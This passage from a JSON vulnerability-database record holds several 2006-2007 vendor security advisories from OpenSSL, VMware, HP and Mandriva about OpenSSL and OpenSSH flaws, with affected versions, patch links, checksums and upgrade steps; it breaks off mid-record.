NISCC\nfor funding the ASN.1 test suite project.  An attacker could send a list of ciphers to an\napplication that uses this function and overrun a buffer\n(CVE-2006-3738). \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Tavis Ormandy and Will Drewry of the Google\nSecurity Team for reporting this issue. \n\n\nSSLv2 Client Crash (CVE-2006-4343)\n==================================\n\nVulnerability\n-------------\n\nA flaw in the SSLv2 client code was discovered. \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Tavis Ormandy and Will Drewry of the Google\nSecurity Team for reporting this issue. \n\n\nRecommendations\n===============\n\nThese vulnerabilities are resolved in the following versions of OpenSSL:\n\n   - in the 0.9.7 branch, version 0.9.7l (or later);\n   - in the 0.9.8 branch, version 0.9.8d (or later). \n\nOpenSSL 0.9.8d and OpenSSL 0.9.7l are available for download via\nHTTP and FTP from the following master locations (you can find the\nvarious FTP mirrors under https://www.openssl.org/source/mirror.html):\n\n    o https://www.openssl.org/source/\n    o ftp://ftp.openssl.org/source/\n\nThe distribution file names are:\n\n    o openssl-0.9.8d.tar.gz\n      MD5 checksum: 8ed1853538e1d05a1f5ada61ebf8bffa\n      SHA1 checksum: 4136fba00303a3d319d2052bfa8e1f09a2e12fc2\n\n    o openssl-0.9.7l.tar.gz\n      MD5 checksum: b21d6e10817ddeccf5fbe1379987333e\n      SHA1 checksum: f0e4136639b10cbd1227c4f7350ff7ad406e575d\n    \nThe checksums were calculated using the following commands:\n\n    openssl md5 openssl-0.9*.tar.gz\n    openssl sha1 openssl-0.9*.tar.gz\n\nAfter upgrading make sure to recompile any applications statically\nlinked to OpenSSL libraries and restart all applications that use\nOpenSSL. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n- -------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2007-0001\nSynopsis:          VMware ESX server security updates\nIssue date:        2007-01-08\nUpdated on:        2007-01-08\nCVE:               CVE-2006-3589 CVE-2006-2937 CVE-2006-2940\n                   CVE-2006-3738 CVE-2006-4339 CVE-2006-4343\n                   CVE-2006-4980\n- -------------------------------------------------------------------\n\n1. Summary:\n\nUpdated ESX Patches address several security issues. \n\n2. Relevant releases:\n\nVMware ESX 3.0.1 without patch ESX-9986131\nVMware ESX 3.0.0 without patch ESX-3069097\n\nVMware ESX 2.5.4 prior to upgrade patch 3\nVMware ESX 2.5.3 prior to upgrade patch 6\nVMware ESX 2.1.3 prior to upgrade patch 4\nVMware ESX 2.0.2 prior to upgrade patch 4\n\n3. Problem description:\n\nProblems addressed by these patches:\n\na. Incorrect permissions on SSL key files generated  by vmware-config\n(CVE-2006-3589):\n\n    ESX 3.0.1: does not have this problem\n    ESX 3.0.0: does not have this problem\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    A possible security issue with the configuration program\n    vmware-config which could set incorrect permissions on SSL key\n    files. Local users may be able to obtain access to the SSL key\n    files. The Common Vulnerabilities and Exposures project\n    (cve.mitre.org) assigned the name CVE-2006-3589 to this issue. \n\nb. OpenSSL library vulnerabilities:\n\n    ESX 3.0.1: corrected by ESX 3.0.1 Patch ESX-9986131\n    ESX 3.0.0: corrected by ESX 3.0.0 Patch ESX-3069097\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    (CVE-2006-2937) OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d\n    allows remote attackers to cause a denial of service (infinite\n    loop and memory consumption) via malformed ASN.1 structures that\n    trigger an improperly handled error condition. \n\n    (CVE-2006-2940) OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d,\n    and earlier versions allows attackers to cause a denial of service\n    (CPU consumption) via parasitic public keys with large (1) \"public\n    exponent\" or (2) \"public modulus\" values in X.509 certificates that\n    require extra time to process when using RSA signature verification. \n\n    (CVE-2006-4339) OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8\n    before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1\n    padding before generating a hash, which allows remote attackers to\n    forge a PKCS #1 v1.5 signature that is signed by that RSA key and\n    prevents OpenSSL from correctly verifying X.509 and other\n    certificates that use PKCS #1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the names CVE-2006-2937, CVE-2006-2940, CVE-2006-3738,\n    CVE-2006-4339, and CVE-2006-4343 to these issues. \n\nc. Updated OpenSSH package addresses the following possible security issues:\n\n    ESX 3.0.1: corrected by Patch ESX-9986131\n    ESX 3.0.0: corrected by Patch ESX-3069097\n    ESX 2.5.4: does not have these problems\n    ESX 2.5.3: does not have these problems\n    ESX 2.1.3: does not have these problems\n    ESX 2.0.2: does not have these problems\n\n    (CVE-2004-2069) sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly\n    other versions, when using privilege separation, does not properly\n    signal the non-privileged process when a session has been terminated\n    after exceeding the LoginGraceTime setting, which leaves the\n    connection open and allows remote attackers to cause a denial of\n    service (connection consumption). \n\n    (CVE-2006-0225) scp in OpenSSH 4.2p1 allows attackers to execute\n    arbitrary commands via filenames that contain shell metacharacters\n    or spaces, which are expanded twice. \n\n    (CVE-2003-0386) OpenSSH 3.6.1 and earlier, when restricting host\n    access by numeric IP addresses and with VerifyReverseMapping\n    disabled, allows remote attackers to bypass \"from=\" and \"user@host\"\n    address restrictions by connecting to a host from a system whose\n    reverse DNS hostname contains the numeric IP address. \n\n    (CVE-2006-4924) sshd in OpenSSH before 4.4, when using the version 1\n    SSH protocol, allows remote attackers to cause a denial of service\n    (CPU consumption) via an SSH packet that contains duplicate blocks,\n    which is not properly handled by the CRC compensation attack\n    detector. \n\n    NOTE: ESX by default disables version 1 SSH protocol. \n\n    (CVE-2006-5051) Signal handler race condition in OpenSSH before 4.4\n    allows remote attackers to cause a denial of service (crash), and\n    possibly execute arbitrary code if GSSAPI authentication is enabled,\n    via unspecified vectors that lead to a double-free. \n\n    NOTE: ESX doesn\u0027t use GSSAPI by default. \n\n    (CVE-2006-5794) Unspecified vulnerability in the sshd Privilege\n    Separation Monitor in OpenSSH before 4.5 causes weaker verification\n    that authentication has been successful, which might allow attackers\n    to bypass authentication. \n\n    NOTE: as of 20061108, it is believed that this issue is only\n    exploitable by leveraging vulnerabilities in the unprivileged\n    process, which are not known to exist. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the names CVE-2004-2069, CVE-2006-0225, CVE-2003-0386,\n    CVE-2006-4924, CVE-2006-5051, and CVE-2006-5794 to these issues. \n\nd. Object reuse problems with newly created virtual disk (.vmdk or .dsk)\nfiles:\n\n    ESX 3.0.1: does not have this problem\n    ESX 3.0.0: does not have this problem\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    A possible security issue with virtual disk (.vmdk or .dsk) files\n    that are newly created, but contain blocks from recently deleted\n    virtual disk files.  Information belonging to the previously\n    deleted virtual disk files could be revealed in newly created\n    virtual disk files. \n\n    VMware recommends the following workaround: When creating new\n    virtual machines on an ESX Server that may contain sensitive\n    data, use vmkfstools with the -W option. This initializes the\n    virtual disk with zeros.  NOTE: ESX 3.x defines this option as -w. \n\ne. Buffer overflow in Python function repr():\n\n    ESX 3.0.1: corrected by Patch ESX-9986131\n    ESX 3.0.0: corrected by ESX-3069097\n    ESX 2.5.4: does not have this problem\n    ESX 2.5.3: does not have this problem\n    ESX 2.1.3: does not have this problem\n    ESX 2.0.2: does not have this problem\n\n    A possible security issue with how the Python function repr()\n    function handles UTF-32/UCS-4 strings. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the name CVE-2006-4980 to this issue. \n\n4. Solution:\n\nPlease review the Patch notes for your version of ESX and verify the md5sum. \n\n  ESX 3.0.1\n  http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html\n  md5usm: 239375e107fd4c7af57663f023863fcb\n\n  ESX 3.0.0\n  http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html\n  md5sum: ca9947239fffda708f2c94f519df33dc\n\n  ESX 2.5.4\n  http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html\n  md5sum: 239375e107fd4c7af57663f023863fcb\n\n  ESX 2.5.3\n  http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html\n  md5sum: f90fcab28362edbf2311f3ca90cc7739\n\n  ESX 2.1.3\n  http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html\n  md5sum: 7d7d0e40f4dccd5ca64b9c13a856da8f\n\n  ESX 2.0.2\n  http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html\n  md5sum: 925e70f28d17714c53fdbd24de64329f\n\n\n5. References:\n\nESX 3.0.0 Patch URL:\nhttp://www.vmware.com/support/vi3/doc/esx-3069097-patch.html\nKnowledge base URL:  http://kb.vmware.com/kb/3069097\n\nESX 3.0.1 Patch URL:\nhttp://www.vmware.com/support/vi3/doc/esx-9986131-patch.html\nKnowledge base URL:  http://kb.vmware.com/kb/9986131\n\nESX 2.5.4 Patch URL:\nhttp://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html\n\nESX 2.5.3 Patch URL:\nhttp://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html\n\nESX 2.1.3 Patch URL:\nhttp://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html\n\nESX 2.0.2 Patch URL:\nhttp://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4980\n\n6. Contact:\n\nhttp://www.vmware.com/security\n\nVMware Security Response Policy\nhttp://www.vmware.com/vmtn/technology/security/security_response.html\n\nE-mail:  security@vmware.com\n\nCopyright 2007 VMware Inc. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD8DBQFFovs16KjQhy2pPmkRCMfyAKCXhdGwZyXW5VzSwcOmu2NNXKN/OwCgo+CE\nneFG0RikD74TCYeXKW6CBy4=\n=9/6k\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \n________________________________________________________________________\n\nReferences:\n  [0] http://www.openssl.org/news/secadv_20060928.txt \n  [1] http://www.openssl.org/\n  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n  [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n________________________________________________________________________\n\nFor security reasons, this advisory was digitally signed with the\nOpenPGP public key \"OpenPKG \u003copenpkg@openpkg.org\u003e\" (ID 63C4CB9F) of the\nOpenPKG project which you can retrieve from http://pgp.openpkg.org and\nhkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org\nfor details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c00849540\nVersion: 1\n\nHPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2007-01-17\nLast Updated: 2007-01-23\n\nPotential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with Apache running on HP-UX. \n\nReferences: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01\n\nBACKGROUND\n\nAFFECTED VERSIONS\n\nFor IPv4:\nHP-UX B.11.00\nHP-UX B.11.11\n===========\nhpuxwsAPACHE\naction: install revision A.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nFor IPv6:\nHP-UX B.11.11\n===========\nhpuxwsAPACHE,revision=B.1.0.00.01\nhpuxwsAPACHE,revision=B.1.0.07.01\nhpuxwsAPACHE,revision=B.1.0.08.01\nhpuxwsAPACHE,revision=B.1.0.09.01\nhpuxwsAPACHE,revision=B.1.0.10.01\nhpuxwsAPACHE,revision=B.2.0.48.00\nhpuxwsAPACHE,revision=B.2.0.49.00\nhpuxwsAPACHE,revision=B.2.0.50.00\nhpuxwsAPACHE,revision=B.2.0.51.00\nhpuxwsAPACHE,revision=B.2.0.52.00\nhpuxwsAPACHE,revision=B.2.0.53.00\nhpuxwsAPACHE,revision=B.2.0.54.00\nhpuxwsAPACHE,revision=B.2.0.55.00\nhpuxwsAPACHE,revision=B.2.0.56.00\nhpuxwsAPACHE,revision=B.2.0.58.00\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.23\n===========\nhpuxwsAPACHE\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nEND AFFECTED VERSIONS\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the issue. \nSoftware updates for the Apache-based Web Server are available from:\nhttp://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent. \n\nApache Update Procedure\n\nCheck for Apache Installation\n -----------------------------\nTo determine if the Apache web server from HP is installed on your system, use Software Distributor\u0027s swlist command. All three revisions of the product may co-exist on a single system. \nFor example, the results of the command swlist -l product | grep -I apache\nhpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server\n\nStop Apache\n -------------\nBefore updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. \nAfter determining which Apache is installed, stop Apache with the following commands:\nfor hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop\n\nDownload and Install Apache\n --------------------------\nDownload Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\nVerify successful download by comparing the cksum with the value specified on the installation web page. \nUse SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported. \n\nRemoving Apache Installation\n ---------------------------\nThe potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor\u0027s \"swremove\" command and also \"rm -rf\" the home location as specified in the rc.config.d file \"HOME\" variables. \n%ls /etc/rc.config.d | \\ grep apache hpapache2conf hpws_apache[32]conf\n\nMANUAL ACTIONS: Yes - Update plus other actions\nInstall the revision of the product. \n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. \nFor more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA\n\nHISTORY: rev.1 - 23 January 2007 Initial Release\n\nThird Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n  - verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\n\\xa9Copyright 2007 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2006.0:\n 17e2d82c3f6c0afbf48eccbfbcc17b55  2006.0/i586/libopenssl0.9.7-0.9.7g-2.4.20060mdk.i586.rpm\n 8c3f89e1900f069d4a4ad3162a9f7d78  2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.4.20060mdk.i586.rpm\n 3a68c653ba0339ba99162459385c72e2  2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.i586.rpm\n 8291bde3bd9aa95533aabc07280203b8  2006.0/i586/openssl-0.9.7g-2.4.20060mdk.i586.rpm \n 52b3fbfc1389bcd73e406d6ff741e9dc  2006.0/SRPMS/openssl-0.9.7g-2.4.20060mdk.src.rpm\n\n Mandriva Linux 2006.0/X86_64:\n b2ce6e6bb7e3114663d3a074d0cc7da5  2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.4.20060mdk.x86_64.rpm\n f7c8dbc2eda0c90547d43661454d1068  2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.4.20060mdk.x86_64.rpm\n 7c9ebd9f9179f4e93627dcf0f3442335  2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.x86_64.rpm\n 17e2d82c3f6c0afbf48eccbfbcc17b55  2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.4.20060mdk.i586.rpm\n 8c3f89e1900f069d4a4ad3162a9f7d78  2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.4.20060mdk.i586.rpm\n 3a68c653ba0339ba99162459385c72e2  2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.i586.rpm\n 6ce5832a59b8b67425cb7026ea9dc876  2006.0/x86_64/openssl-0.9.7g-2.4.20060mdk.x86_64.rpm \n 52b3fbfc1389bcd73e406d6ff741e9dc  2006.0/SRPMS/openssl-0.9.7g-2.4.20060mdk.src.rpm\n\n Mandriva Linux 2007.0:\n 1bfeff47c8d2f6c020c459881be68207  2007.0/i586/libopenssl0.9.8-0.9.8b-2.1mdv2007.0.i586.rpm\n 1e1a4db54ddfaedb08a6d847422099ff  2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.1mdv2007.0.i586.rpm\n 59c80405f33b2e61ffd3cef025635e21  2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.1mdv2007.0.i586.rpm\n 3a6657970a2e7661bd869d221a69c8da  2007.0/i586/openssl-0.9.8b-2.1mdv2007.0.i586.rpm \n aad29e57ddceb66105af5d6434de9a62  2007.0/SRPMS/openssl-0.9.8b-2.1mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n af679c647d97214244a8423dc1a766b7  2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.1mdv2007.0.x86_64.rpm\n d7b1ed07df4115b3bcc3907e00d25a89  2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.1mdv2007.0.x86_64.rpm\n 5bd3ece2c0ec7a3201c29fa84e25a75a  2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.1mdv2007.0.x86_64.rpm\n 9b028020dba009eddbf06eeb8607b87f  2007.0/x86_64/openssl-0.9.8b-2.1mdv2007.0.x86_64.rpm \n aad29e57ddceb66105af5d6434de9a62  2007.0/SRPMS/openssl-0.9.8b-2.1mdv2007.0.src.rpm\n\n Corporate 3.0:\n c99ea58f6f4959a4c36398cc6b2b4ee2  corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.6.C30mdk.i586.rpm\n 98a925c5ba2ecc9d704b1e730035755e  corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.6.C30mdk.i586.rpm\n 151493a50693e3b9cc67bfafadb9ce42  corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.6.C30mdk.i586.rpm\n 82b4709bdbb9128746887013a724356a  corporate/3.0/i586/openssl-0.9.7c-3.6.C30mdk.i586.rpm \n a5bdbe6afa52005a734dc18aa951677d  corporate/3.0/SRPMS/openssl-0.9.7c-3.6.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 01a922d80d6fc9d1b36dde15ee27747e  corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.6.C30mdk.x86_64.rpm\n 30268f0b70862d1f5998694ac8b4addc  corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.6.C30mdk.x86_64.rpm\n e0388ff1efa34ea55d033e95b4e9bb63  corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.6.C30mdk.x86_64.rpm\n c99ea58f6f4959a4c36398cc6b2b4ee2  corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.6.C30mdk.i586.rpm\n 83759622f0cc8ea9c0f6d32671283354  corporate/3.0/x86_64/openssl-0.9.7c-3.6.C30mdk.x86_64.rpm \n a5bdbe6afa52005a734dc18aa951677d  corporate/3.0/SRPMS/openssl-0.9.7c-3.6.C30mdk.src.rpm\n\n Corporate 4.0:\n 6d71d2358738be9967b2dfe19d3642f1  corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.4.20060mlcs4.i586.rpm\n 22890554d3096ce596eeec7393ee3fcf  corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.i586.rpm\n 679fe740859fa35b2bb77b19c4a0e787  corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.i586.rpm\n d8477333b67ec3a36ba46c50e6183993  corporate/4.0/i586/openssl-0.9.7g-2.4.20060mlcs4.i586.rpm \n b65dbbd9fb3d74d302478640476a2cd2  corporate/4.0/SRPMS/openssl-0.9.7g-2.4.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 746e5e916d1e05379373138a5db20923  corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.4.20060mlcs4.x86_64.rpm\n a2b1d750075a32fe8badbdf1f7febafe  corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.x86_64.rpm\n 47c464cf890a004f772c1db3e839fa12  corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.x86_64.rpm\n 6d71d2358738be9967b2dfe19d3642f1  corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.4.20060mlcs4.i586.rpm\n 22890554d3096ce596eeec7393ee3fcf  corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.i586.rpm\n 679fe740859fa35b2bb77b19c4a0e787  corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.i586.rpm\n 1030a6124a9fa4fd5a41bdff077301bf  corporate/4.0/x86_64/openssl-0.9.7g-2.4.20060mlcs4.x86_64.rpm \n b65dbbd9fb3d74d302478640476a2cd2  corporate/4.0/SRPMS/openssl-0.9.7g-2.4.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n 19055eda58e1f75814e594ce7709a710  mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.6.M20mdk.i586.rpm\n abfe548617969f619aec5b0e807f1f67  mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.6.M20mdk.i586.rpm\n 92e7515c9125367a79fdb490f5b39cd4  mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.6.M20mdk.i586.rpm\n 847eecb1d07e4cab3d1de1452103c3a0  mnf/2.0/i586/openssl-0.9.7c-3.6.M20mdk.i586.rpm \n b6b67fa82d7119cde7ab7816aed17059  mnf/2.0/SRPMS/openssl-0.9.7c-3.6.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\n\niD8DBQFFHA4hmqjQ0CJFipgRApknAJ9Ybd8xjfkR+RL1fWEI2Fgn/KIuqACeOH/0\nwB09L3fylyiHgrXvSV6VL7A=\n=/+dm\n-----END PGP SIGNATURE-----\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          }
        ],
        "trust": 3.78
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "BID",
            "id": "22083",
            "trust": 3.4
          },
          {
            "db": "SECUNIA",
